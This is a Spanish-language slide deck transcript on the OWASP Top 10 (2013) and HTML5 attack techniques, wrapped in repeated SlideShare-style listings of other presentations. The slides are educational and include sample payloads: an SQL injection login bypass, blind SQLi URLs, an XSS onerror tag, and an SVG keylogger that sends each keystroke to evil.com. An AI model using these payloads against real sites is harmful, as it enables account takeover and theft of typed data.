¡Tsunami! ¿Vas a quedarte mirando la ola?: Panorama Actual de Ciberseguridad ...
¡Tsunami! ¿Vas a quedarte mirando la ola?: Panorama Actual de Ciberseguridad ...¡Tsunami! ¿Vas a quedarte mirando la ola?: Panorama Actual de Ciberseguridad ...
¡Tsunami! ¿Vas a quedarte mirando la ola?: Panorama Actual de Ciberseguridad ...Nextel S.A.
 
Evaluación de riesgos asociados al puesto de trabajo: empleados, externos, vi...
Evaluación de riesgos asociados al puesto de trabajo: empleados, externos, vi...Evaluación de riesgos asociados al puesto de trabajo: empleados, externos, vi...
Evaluación de riesgos asociados al puesto de trabajo: empleados, externos, vi...Nextel S.A.
 
Gestiona el riesgo de las grandes amenazas
Gestiona el riesgo de las grandes amenazasGestiona el riesgo de las grandes amenazas
Gestiona el riesgo de las grandes amenazasNextel S.A.
 
Linked data: mayor granularidad, mayor control de acceso
Linked data: mayor granularidad, mayor control de accesoLinked data: mayor granularidad, mayor control de acceso
Linked data: mayor granularidad, mayor control de accesoNextel S.A.
 
El Negocio del Riesgo
El Negocio del RiesgoEl Negocio del Riesgo
El Negocio del RiesgoNextel S.A.
 
Detección y mitigación de amenazas con Check Point
Detección y mitigación de amenazas con Check PointDetección y mitigación de amenazas con Check Point
Detección y mitigación de amenazas con Check PointNextel S.A.
 
Seguridad: sembrando confianza en el cloud
Seguridad: sembrando confianza en el cloudSeguridad: sembrando confianza en el cloud
Seguridad: sembrando confianza en el cloudNextel S.A.
 
Ahorrar invirtiendo, los beneficios de una buena gestión TIC
Ahorrar invirtiendo, los beneficios de una buena gestión TICAhorrar invirtiendo, los beneficios de una buena gestión TIC
Ahorrar invirtiendo, los beneficios de una buena gestión TICNextel S.A.
 
redBorder: Open or die
redBorder: Open or dieredBorder: Open or die
redBorder: Open or dieNextel S.A.
 
Gestión automatizada de la Continuidad de Negocio con GlobalContinuity
Gestión automatizada de la Continuidad de Negocio con GlobalContinuityGestión automatizada de la Continuidad de Negocio con GlobalContinuity
Gestión automatizada de la Continuidad de Negocio con GlobalContinuityNextel S.A.
 
Caso práctico: Implementación de GlobalSuite en un entorno heterogéneo de gra...
Caso práctico: Implementación de GlobalSuite en un entorno heterogéneo de gra...Caso práctico: Implementación de GlobalSuite en un entorno heterogéneo de gra...
Caso práctico: Implementación de GlobalSuite en un entorno heterogéneo de gra...Nextel S.A.
 
El Reto de la Continuidad de Negocio
El Reto de la Continuidad de NegocioEl Reto de la Continuidad de Negocio
El Reto de la Continuidad de NegocioNextel S.A.
 
Red hat transforme su negocio mediante una estrategia de virtualización abierta
Red hat transforme su negocio mediante una estrategia de virtualización abierta Red hat transforme su negocio mediante una estrategia de virtualización abierta
Red hat transforme su negocio mediante una estrategia de virtualización abierta Nextel S.A.
 

Mais de Nextel S.A. (20)

Transformación de la organización TI
Transformación de la organización TITransformación de la organización TI
Transformación de la organización TI
 
Relación entre Tecnología y Negocio
Relación entre Tecnología y NegocioRelación entre Tecnología y Negocio
Relación entre Tecnología y Negocio
 
Visión práctica sobre catálogo de servicios y gestión de costes TIC
Visión práctica sobre catálogo de servicios y gestión de costes TICVisión práctica sobre catálogo de servicios y gestión de costes TIC
Visión práctica sobre catálogo de servicios y gestión de costes TIC
 
Nuevo modelo de gestión avanzada
Nuevo modelo de gestión avanzadaNuevo modelo de gestión avanzada
Nuevo modelo de gestión avanzada
 
La gestión de una empresa pública TI
La gestión de una empresa pública TILa gestión de una empresa pública TI
La gestión de una empresa pública TI
 
Futuro y Tendencias TI - Preparación de profesionales en la Universidad
Futuro y Tendencias TI - Preparación de profesionales en la UniversidadFuturo y Tendencias TI - Preparación de profesionales en la Universidad
Futuro y Tendencias TI - Preparación de profesionales en la Universidad
 
Presentacion de Nextel S.A.
Presentacion de Nextel S.A.Presentacion de Nextel S.A.
Presentacion de Nextel S.A.
 
¡Tsunami! ¿Vas a quedarte mirando la ola?: Panorama Actual de Ciberseguridad ...
¡Tsunami! ¿Vas a quedarte mirando la ola?: Panorama Actual de Ciberseguridad ...¡Tsunami! ¿Vas a quedarte mirando la ola?: Panorama Actual de Ciberseguridad ...
¡Tsunami! ¿Vas a quedarte mirando la ola?: Panorama Actual de Ciberseguridad ...
 
Evaluación de riesgos asociados al puesto de trabajo: empleados, externos, vi...
Evaluación de riesgos asociados al puesto de trabajo: empleados, externos, vi...Evaluación de riesgos asociados al puesto de trabajo: empleados, externos, vi...
Evaluación de riesgos asociados al puesto de trabajo: empleados, externos, vi...
 
Gestiona el riesgo de las grandes amenazas
Gestiona el riesgo de las grandes amenazasGestiona el riesgo de las grandes amenazas
Gestiona el riesgo de las grandes amenazas
 
Linked data: mayor granularidad, mayor control de acceso
Linked data: mayor granularidad, mayor control de accesoLinked data: mayor granularidad, mayor control de acceso
Linked data: mayor granularidad, mayor control de acceso
 
El Negocio del Riesgo
El Negocio del RiesgoEl Negocio del Riesgo
El Negocio del Riesgo
 
Detección y mitigación de amenazas con Check Point
Detección y mitigación de amenazas con Check PointDetección y mitigación de amenazas con Check Point
Detección y mitigación de amenazas con Check Point
 
Seguridad: sembrando confianza en el cloud
Seguridad: sembrando confianza en el cloudSeguridad: sembrando confianza en el cloud
Seguridad: sembrando confianza en el cloud
 
Ahorrar invirtiendo, los beneficios de una buena gestión TIC
Ahorrar invirtiendo, los beneficios de una buena gestión TICAhorrar invirtiendo, los beneficios de una buena gestión TIC
Ahorrar invirtiendo, los beneficios de una buena gestión TIC
 
redBorder: Open or die
redBorder: Open or dieredBorder: Open or die
redBorder: Open or die
 
Gestión automatizada de la Continuidad de Negocio con GlobalContinuity
Gestión automatizada de la Continuidad de Negocio con GlobalContinuityGestión automatizada de la Continuidad de Negocio con GlobalContinuity
Gestión automatizada de la Continuidad de Negocio con GlobalContinuity
 
Caso práctico: Implementación de GlobalSuite en un entorno heterogéneo de gra...
Caso práctico: Implementación de GlobalSuite en un entorno heterogéneo de gra...Caso práctico: Implementación de GlobalSuite en un entorno heterogéneo de gra...
Caso práctico: Implementación de GlobalSuite en un entorno heterogéneo de gra...
 
El Reto de la Continuidad de Negocio
El Reto de la Continuidad de NegocioEl Reto de la Continuidad de Negocio
El Reto de la Continuidad de Negocio
 
Red hat transforme su negocio mediante una estrategia de virtualización abierta
Red hat transforme su negocio mediante una estrategia de virtualización abierta Red hat transforme su negocio mediante una estrategia de virtualización abierta
Red hat transforme su negocio mediante una estrategia de virtualización abierta
 

Último

LAS_TIC_COMO_HERRAMIENTAS_EN_LA_INVESTIGACIÓN.pptx
LAS_TIC_COMO_HERRAMIENTAS_EN_LA_INVESTIGACIÓN.pptxLAS_TIC_COMO_HERRAMIENTAS_EN_LA_INVESTIGACIÓN.pptx
LAS_TIC_COMO_HERRAMIENTAS_EN_LA_INVESTIGACIÓN.pptxAlexander López
 
Excel (1) tecnologia.pdf trabajo Excel taller
Excel (1) tecnologia.pdf trabajo Excel tallerExcel (1) tecnologia.pdf trabajo Excel taller
Excel (1) tecnologia.pdf trabajo Excel tallerValentinaTabares11
 
Medidas de formas, coeficiente de asimetría y coeficiente de curtosis.pptx
Medidas de formas, coeficiente de asimetría y coeficiente de curtosis.pptxMedidas de formas, coeficiente de asimetría y coeficiente de curtosis.pptx
Medidas de formas, coeficiente de asimetría y coeficiente de curtosis.pptxaylincamaho
 
El uso de las tic en la vida ,lo importante que son
El uso de las tic en la vida ,lo importante que sonEl uso de las tic en la vida ,lo importante que son
El uso de las tic en la vida ,lo importante que son241514984
 
Tecnologias Starlink para el mundo tec.pptx
Tecnologias Starlink para el mundo tec.pptxTecnologias Starlink para el mundo tec.pptx
Tecnologias Starlink para el mundo tec.pptxGESTECPERUSAC
 
Presentación sobre la Inteligencia Artificial
Presentación sobre la Inteligencia ArtificialPresentación sobre la Inteligencia Artificial
Presentación sobre la Inteligencia Artificialcynserafini89
 
Mapa-conceptual-del-Origen-del-Universo-3.pptx
Mapa-conceptual-del-Origen-del-Universo-3.pptxMapa-conceptual-del-Origen-del-Universo-3.pptx
Mapa-conceptual-del-Origen-del-Universo-3.pptxMidwarHenryLOZAFLORE
 
GonzalezGonzalez_Karina_M1S3AI6... .pptx
GonzalezGonzalez_Karina_M1S3AI6... .pptxGonzalezGonzalez_Karina_M1S3AI6... .pptx
GonzalezGonzalez_Karina_M1S3AI6... .pptx241523733
 
AREA TECNOLOGIA E INFORMATICA TRABAJO EN EQUIPO
AREA TECNOLOGIA E INFORMATICA TRABAJO EN EQUIPOAREA TECNOLOGIA E INFORMATICA TRABAJO EN EQUIPO
AREA TECNOLOGIA E INFORMATICA TRABAJO EN EQUIPOnarvaezisabella21
 
Actividad integradora 6 CREAR UN RECURSO MULTIMEDIA
Actividad integradora 6 CREAR UN RECURSO MULTIMEDIAActividad integradora 6 CREAR UN RECURSO MULTIMEDIA
Actividad integradora 6 CREAR UN RECURSO MULTIMEDIA241531640
 
LUXOMETRO EN SALUD OCUPACIONAL(FINAL).ppt
LUXOMETRO EN SALUD OCUPACIONAL(FINAL).pptLUXOMETRO EN SALUD OCUPACIONAL(FINAL).ppt
LUXOMETRO EN SALUD OCUPACIONAL(FINAL).pptchaverriemily794
 
Los Microcontroladores PIC, Aplicaciones
Los Microcontroladores PIC, AplicacionesLos Microcontroladores PIC, Aplicaciones
Los Microcontroladores PIC, AplicacionesEdomar AR
 
Crear un recurso multimedia. Maricela_Ponce_DomingoM1S3AI6-1.pptx
Crear un recurso multimedia. Maricela_Ponce_DomingoM1S3AI6-1.pptxCrear un recurso multimedia. Maricela_Ponce_DomingoM1S3AI6-1.pptx
Crear un recurso multimedia. Maricela_Ponce_DomingoM1S3AI6-1.pptxNombre Apellidos
 
La Electricidad Y La Electrónica Trabajo Tecnología.pdf
La Electricidad Y La Electrónica Trabajo Tecnología.pdfLa Electricidad Y La Electrónica Trabajo Tecnología.pdf
La Electricidad Y La Electrónica Trabajo Tecnología.pdfjeondanny1997
 
Presentación inteligencia artificial en la actualidad
Presentación inteligencia artificial en la actualidadPresentación inteligencia artificial en la actualidad
Presentación inteligencia artificial en la actualidadMiguelAngelVillanuev48
 
El uso de las TIC's en la vida cotidiana.
El uso de las TIC's en la vida cotidiana.El uso de las TIC's en la vida cotidiana.
El uso de las TIC's en la vida cotidiana.241514949
 
TEMA 2 PROTOCOLO DE EXTRACCION VEHICULAR.ppt
TEMA 2 PROTOCOLO DE EXTRACCION VEHICULAR.pptTEMA 2 PROTOCOLO DE EXTRACCION VEHICULAR.ppt
TEMA 2 PROTOCOLO DE EXTRACCION VEHICULAR.pptJavierHerrera662252
 
El_Blog_como_herramienta_de_publicacion_y_consulta_de_investigacion.pptx
El_Blog_como_herramienta_de_publicacion_y_consulta_de_investigacion.pptxEl_Blog_como_herramienta_de_publicacion_y_consulta_de_investigacion.pptx
El_Blog_como_herramienta_de_publicacion_y_consulta_de_investigacion.pptxAlexander López
 
Red Dorsal Nacional de Fibra Óptica y Redes Regionales del Perú
Red Dorsal Nacional de Fibra Óptica y Redes Regionales del PerúRed Dorsal Nacional de Fibra Óptica y Redes Regionales del Perú
Red Dorsal Nacional de Fibra Óptica y Redes Regionales del PerúCEFERINO DELGADO FLORES
 
Modelo de Presentacion Feria Robotica Educativa 2024 - Versión3.pptx
Modelo de Presentacion Feria Robotica Educativa 2024 - Versión3.pptxModelo de Presentacion Feria Robotica Educativa 2024 - Versión3.pptx
Modelo de Presentacion Feria Robotica Educativa 2024 - Versión3.pptxtjcesar1
 

Último (20)

LAS_TIC_COMO_HERRAMIENTAS_EN_LA_INVESTIGACIÓN.pptx
LAS_TIC_COMO_HERRAMIENTAS_EN_LA_INVESTIGACIÓN.pptxLAS_TIC_COMO_HERRAMIENTAS_EN_LA_INVESTIGACIÓN.pptx
LAS_TIC_COMO_HERRAMIENTAS_EN_LA_INVESTIGACIÓN.pptx
 
Excel (1) tecnologia.pdf trabajo Excel taller
Excel (1) tecnologia.pdf trabajo Excel tallerExcel (1) tecnologia.pdf trabajo Excel taller
Excel (1) tecnologia.pdf trabajo Excel taller
 
Medidas de formas, coeficiente de asimetría y coeficiente de curtosis.pptx
Medidas de formas, coeficiente de asimetría y coeficiente de curtosis.pptxMedidas de formas, coeficiente de asimetría y coeficiente de curtosis.pptx
Medidas de formas, coeficiente de asimetría y coeficiente de curtosis.pptx
 
El uso de las tic en la vida ,lo importante que son
El uso de las tic en la vida ,lo importante que sonEl uso de las tic en la vida ,lo importante que son
El uso de las tic en la vida ,lo importante que son
 
Tecnologias Starlink para el mundo tec.pptx
Tecnologias Starlink para el mundo tec.pptxTecnologias Starlink para el mundo tec.pptx
Tecnologias Starlink para el mundo tec.pptx
 
Presentación sobre la Inteligencia Artificial
Presentación sobre la Inteligencia ArtificialPresentación sobre la Inteligencia Artificial
Presentación sobre la Inteligencia Artificial
 
Mapa-conceptual-del-Origen-del-Universo-3.pptx
Mapa-conceptual-del-Origen-del-Universo-3.pptxMapa-conceptual-del-Origen-del-Universo-3.pptx
Mapa-conceptual-del-Origen-del-Universo-3.pptx
 
GonzalezGonzalez_Karina_M1S3AI6... .pptx
GonzalezGonzalez_Karina_M1S3AI6... .pptxGonzalezGonzalez_Karina_M1S3AI6... .pptx
GonzalezGonzalez_Karina_M1S3AI6... .pptx
 
AREA TECNOLOGIA E INFORMATICA TRABAJO EN EQUIPO
AREA TECNOLOGIA E INFORMATICA TRABAJO EN EQUIPOAREA TECNOLOGIA E INFORMATICA TRABAJO EN EQUIPO
AREA TECNOLOGIA E INFORMATICA TRABAJO EN EQUIPO
 
Actividad integradora 6 CREAR UN RECURSO MULTIMEDIA
Actividad integradora 6 CREAR UN RECURSO MULTIMEDIAActividad integradora 6 CREAR UN RECURSO MULTIMEDIA
Actividad integradora 6 CREAR UN RECURSO MULTIMEDIA
 
LUXOMETRO EN SALUD OCUPACIONAL(FINAL).ppt
LUXOMETRO EN SALUD OCUPACIONAL(FINAL).pptLUXOMETRO EN SALUD OCUPACIONAL(FINAL).ppt
LUXOMETRO EN SALUD OCUPACIONAL(FINAL).ppt
 
Los Microcontroladores PIC, Aplicaciones
Los Microcontroladores PIC, AplicacionesLos Microcontroladores PIC, Aplicaciones
Los Microcontroladores PIC, Aplicaciones
 
Crear un recurso multimedia. Maricela_Ponce_DomingoM1S3AI6-1.pptx
Crear un recurso multimedia. Maricela_Ponce_DomingoM1S3AI6-1.pptxCrear un recurso multimedia. Maricela_Ponce_DomingoM1S3AI6-1.pptx
Crear un recurso multimedia. Maricela_Ponce_DomingoM1S3AI6-1.pptx
 
La Electricidad Y La Electrónica Trabajo Tecnología.pdf
La Electricidad Y La Electrónica Trabajo Tecnología.pdfLa Electricidad Y La Electrónica Trabajo Tecnología.pdf
La Electricidad Y La Electrónica Trabajo Tecnología.pdf
 
Presentación inteligencia artificial en la actualidad
Presentación inteligencia artificial en la actualidadPresentación inteligencia artificial en la actualidad
Presentación inteligencia artificial en la actualidad
 
El uso de las TIC's en la vida cotidiana.
El uso de las TIC's en la vida cotidiana.El uso de las TIC's en la vida cotidiana.
El uso de las TIC's en la vida cotidiana.
 
TEMA 2 PROTOCOLO DE EXTRACCION VEHICULAR.ppt
TEMA 2 PROTOCOLO DE EXTRACCION VEHICULAR.pptTEMA 2 PROTOCOLO DE EXTRACCION VEHICULAR.ppt
TEMA 2 PROTOCOLO DE EXTRACCION VEHICULAR.ppt
 
El_Blog_como_herramienta_de_publicacion_y_consulta_de_investigacion.pptx
El_Blog_como_herramienta_de_publicacion_y_consulta_de_investigacion.pptxEl_Blog_como_herramienta_de_publicacion_y_consulta_de_investigacion.pptx
El_Blog_como_herramienta_de_publicacion_y_consulta_de_investigacion.pptx
 
Red Dorsal Nacional de Fibra Óptica y Redes Regionales del Perú
Red Dorsal Nacional de Fibra Óptica y Redes Regionales del PerúRed Dorsal Nacional de Fibra Óptica y Redes Regionales del Perú
Red Dorsal Nacional de Fibra Óptica y Redes Regionales del Perú
 
Modelo de Presentacion Feria Robotica Educativa 2024 - Versión3.pptx
Modelo de Presentacion Feria Robotica Educativa 2024 - Versión3.pptxModelo de Presentacion Feria Robotica Educativa 2024 - Versión3.pptx
Modelo de Presentacion Feria Robotica Educativa 2024 - Versión3.pptx
 

OWASP Top 10 y nuevas vulnerabilidades HTML5

  • 2. ¿De qué vamos a hablar? ● Oldies goldies: OWASP Top 10, 2013: ● A1 - Injections ● A2 - Broken Authentication and Session Management ● A3 - Cross-Site Scripting (XSS) ● … ● Nuevas vulnerabilidades en torno a HTML5.
  • 3. OWASP Top 10, 2013 https://www.owasp.org/index.php/Top_10_2013-Top_10
  • 4. OWASP The Open Web Application Security Project https://www.owasp.org/index.php/Main_Page
  • 5. A1 - Injection SQL, OS, and LDAP injections https://www.owasp.org/index.php/Top_10_2013-A1
  • 6. SQL Injection Por una comilla de nada... SELECT * FROM users WHERE user = '" + username + "' and password = '" + md5(password) + "'; Username: admin' OR '1'='1 Password: whatever SELECT * FROM users WHERE user = 'admin' OR '1'='1' and password = '" + md5('whatever') + "';
  • 7. SQL Injection Si no hay mensajes de error, Blind SQL Injection ● Si no hay error, se muestra la página normal. ● http://myblog.com/post.asp?id=33 AND 1=1 SELECT * FROM posts WHERE id = 33 AND 1=1 ● Si hay error, se muestra otra página. ● http://myblog.com/post.asp?id=33 AND 1=0 SELECT * FROM posts WHERE id = 33 AND 1=0 ● Google Hacking: – inurl:"php?id=" – inurl:"asp?id="
  • 8. SQL Injection Blind SQL Injection, herramientas ● SQLbfTools: – http://www.reversing.org/node/view/11 ● ./mysqlbf.exe "http://web/vulnerable.php?ID=3" "now()" "word" ● SQL Ninja: – http://sqlninja.sourceforge.net/sqlninjademo1.html ● Absinthe: – http://www.0x90.org/releases/absinthe/download.php
  • 9. A2 - Broken Authentication and Session Management Compromise passwords, keys, session tokens, etc. https://www.owasp.org/index.php/Top_10_2013-A2
  • 11. A3 - Cross-Site Scripting (XSS) Allows attackers to execute scripts in the victim’s browser https://www.owasp.org/index.php/Top_10_2013-A3
  • 12. Cross-Site Scripting (XSS) Diferentes tipos y alcances ● Tipo 0: Basado en DOM. – Una página maliciosa abre una página local con permisos de Zona Local y ejecuta código con esas credenciales. – Típicamente en phising o SPAM. ● Tipo 1: No persistente. – El más común, necesita Ingeniería Social para explotarse. – Típicamente en webs de búsquedas, se muestra a su vez la cadena consultada (si tiene código, será ejecutado). ● Tipo 2: Persistente. – El código está almacenado en una BD, fichero, o similar. – No requiere mucha Ingeniería Social para que la víctima lo ejecute. – Típicamente en foros o similares.
  • 13. A4 - Insecure Direct Object References References to an internal implementation object, such as a file, directory, or database key https://www.owasp.org/index.php/Top_10_2013-A4
  • 15. A5 - Security Misconfiguration Keeping all software up to date https://www.owasp.org/index.php/Top_10_2013-A5
  • 16. The Exploit Database Búsqueda de avisos + exploits ordenados por temas y fechas http://www.exploit-db.com/
  • 17. A6 - Sensitive Data Exposure Sensitive data deserves extra protection such as encryption https://www.owasp.org/index.php/Top_10_2013-A6
  • 18. Seguridad a través de la oscuridad robots.txt http://www.casareal.es/robots.txt User-agent: * Disallow: Disallow: /_*/ Disallow: /ES/FamiliaReal/Urdangarin/ Disallow: /CA/FamiliaReal/Urdangarin/ Disallow: /EU/FamiliaReal/Urdangarin/ Disallow: /GL/FamiliaReal/Urdangarin/ Disallow: /VA/FamiliaReal/Urdangarin/ Disallow: /EN/FamiliaReal/Urdangarin/ Sitemap: http://www.casareal.es/sitemap.xml
  • 19. Seguridad a través de la oscuridad Meta-datos: Fear the FOCA! http://www.informatica64.com/foca.aspx
  • 20. A7 - Missing Function Level Access Control Attackers are able to forge requests in order to access unauthorized functionality https://www.owasp.org/index.php/Top_10_2013-A7
  • 21. Proteger el cron en Moodle Similar para v1.9, 2.x, etc. http://docs.moodle.org/19/en/Cron
  • 22. A8 - Cross-Site Request Forgery (CSRF) Forces a logged-on victim’s browser to send a forged HTTP request https://www.owasp.org/index.php/Top_10_2013-A8
  • 23. Cross-Site Request Forgery (CSRF) XSRF o "sea-surf" ● Explota la confianza que tiene un sitio en el navegador de un cliente autenticado. – El servidor: acepta las credenciales de la sesión de usuario almacenada en el navegador. – El cliente: accede a una web que fuerza a su navegador a realizar acciones no deseadas en un sitio en el que previamente se ha autenticado. ● Contramedida: tokens específicos en cada formulario.
  • 24. A9 - Using Components with Known Vulnerabilities Vulnerable components, such as libraries, frameworks, and other software modules https://www.owasp.org/index.php/Top_10_2013-A9
  • 25. The Exploit Database Búsqueda de avisos + exploits ordenados por temas y fechas http://www.exploit-db.com/
  • 26. A10 - Unvalidated Redirects and Forwards Attackers can redirect victims to phishing or malware sites https://www.owasp.org/index.php/Top_10_2013-A10
  • 27. Ataques de redirección PoCs: IE/Firefox Redirection Issue – FB Oauth2 Bypass – BugCrowd http://soroush.secproject.com/blog/2013/03/iefirefox-redirection-issue-fb-oauth2-bypass-bugcrowd/
  • 28. Nuevas vulnerabilidades en torno a HTML5
  • 29. HTML5 Client-side Stored XSS in Web SQL Database <img onerror="alert('Client-side Stored XSS')" src="nil"> http://www.andlabs.org/html5/csXSS2.html
  • 30. HTML5 Cross Origin Requests wget --header="Origin: http://www.andlabs.org" www.andlabs.net/html5/acCOR.php http://www.andlabs.org/html5/acCOR.php
  • 31. HTML5: muchos más ataques Web Sockets, Web Workers, UI dressing, HTML5 tag abuse, etc. http://html5security.org/
  • 33. Ataques sin scripts falso captcha usando tipografía propia http://heideri.ch/opera/captcha/
  • 34. Ataques sin scripts Fuerza bruta contra password usando CSS y Regexps http://html5sec.org/invalid?start=0
  • 35. Ataques sin scripts Lector de valores del DOM a través de CSS y Regexps (CSRF) http://eaea.sirdarckcat.net/cssar/v2/
  • 36. Ataques sin scripts Capturador de sesión mediante CSS y Regexps http://
  • 37. Ataques sin scripts Keylogger SVG http://html5sec.org/keylogger <!--injection--> <svg height="0px"> <image xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="none"> <set attributeName="xlink:href" begin="accessKey(a)" to="//evil.com/?a" /> <set attributeName="xlink:href" begin="accessKey(b)" to="//evil.com/?b" /> <set attributeName="xlink:href" begin="accessKey(c)" to="//evil.com/?c" /> <set attributeName="xlink:href" begin="accessKey(d)" to="//evil.com/?d" /> <set attributeName="xlink:href" begin="accessKey(e)" to="//evil.com/?e" /> <set attributeName="xlink:href" begin="accessKey(f)" to="//evil.com/?f" /> <set attributeName="xlink:href" begin="accessKey(g)" to="//evil.com/?g" /> <set attributeName="xlink:href" begin="accessKey(h)" to="//evil.com/?h" /> <set attributeName="xlink:href" begin="accessKey(i)" to="//evil.com/?i" /> <set attributeName="xlink:href" begin="accessKey(j)" to="//evil.com/?j" /> <set attributeName="xlink:href" begin="accessKey(k)" to="//evil.com/?k" /> <set attributeName="xlink:href" begin="accessKey(l)" to="//evil.com/?l" /> <set attributeName="xlink:href" begin="accessKey(m)" to="//evil.com/?m" /> <set attributeName="xlink:href" begin="accessKey(n)" to="//evil.com/?n" /> <set attributeName="xlink:href" begin="accessKey(o)" to="//evil.com/?o" /> <set attributeName="xlink:href" begin="accessKey(p)" to="//evil.com/?p" /> <set attributeName="xlink:href" begin="accessKey(q)" to="//evil.com/?q" /> <set attributeName="xlink:href" begin="accessKey(r)" to="//evil.com/?r" /> <set attributeName="xlink:href" begin="accessKey(s)" to="//evil.com/?s" /> <set attributeName="xlink:href" begin="accessKey(t)" to="//evil.com/?t" /> <set attributeName="xlink:href" begin="accessKey(u)" to="//evil.com/?u" /> <set attributeName="xlink:href" begin="accessKey(v)" to="//evil.com/?v" /> <set attributeName="xlink:href" begin="accessKey(w)" to="//evil.com/?w" /> <set attributeName="xlink:href" begin="accessKey(x)" to="//evil.com/?x" /> <set attributeName="xlink:href" begin="accessKey(y)" to="//evil.com/?y" /> <set attributeName="xlink:href" begin="accessKey(z)" to="//evil.com/?z" /> </image> </svg>
  • 38. Ataques sin scripts Fuerza bruta contra contraseñas mediante tipografía con “ligaduras” http://fontforge.org/
  • 39. “All user input is evil until proven otherwise” Ken Cox
  • 40. Muchas gracias ;-) and... happy hacking!
  • 41. Referencias ● OWASP: The Open Web Application Security Project. ● El lado del mal, retos hacking, por Chema Alonso. ● Fear the FOCA! Informática64. ● IE/Firefox Redirection Issue – FB Oauth2 Bypass – BugCrowd, por Soroush Dalili. ● HTML5 Top 10 Threats Stealth Attacks and Silent Exploits, Shreeraj Shah. ● HTML5 security. ● Scriptless Attacks: Stealing the pie without touching the sill, por Mario Heiderich, Felix Schuster y Marcus Niemietz. ● The Exploit Database.
  • 42. Todas las imágenes son propiedad de sus respectivos dueños, el resto del contenido está licenciado bajo Creative Commons by-sa 3.0 http://www.zerodayclothing.com, OWASP.org, Microsoft, Exploit-db.com, Informatica64, http://www.flickr.com/photos/ivanlian/3331017290/sizes/l/in/photostream/ http://www.flickr.com/photos/samout3/3411358304/sizes/l/in/photostream/ http://www.flickr.com/photos/ndanger/9731511/sizes/l/in/photostream/ http://www.flickr.com/photos/marcophoto/6264497575/sizes/l/in/photostream/ etc.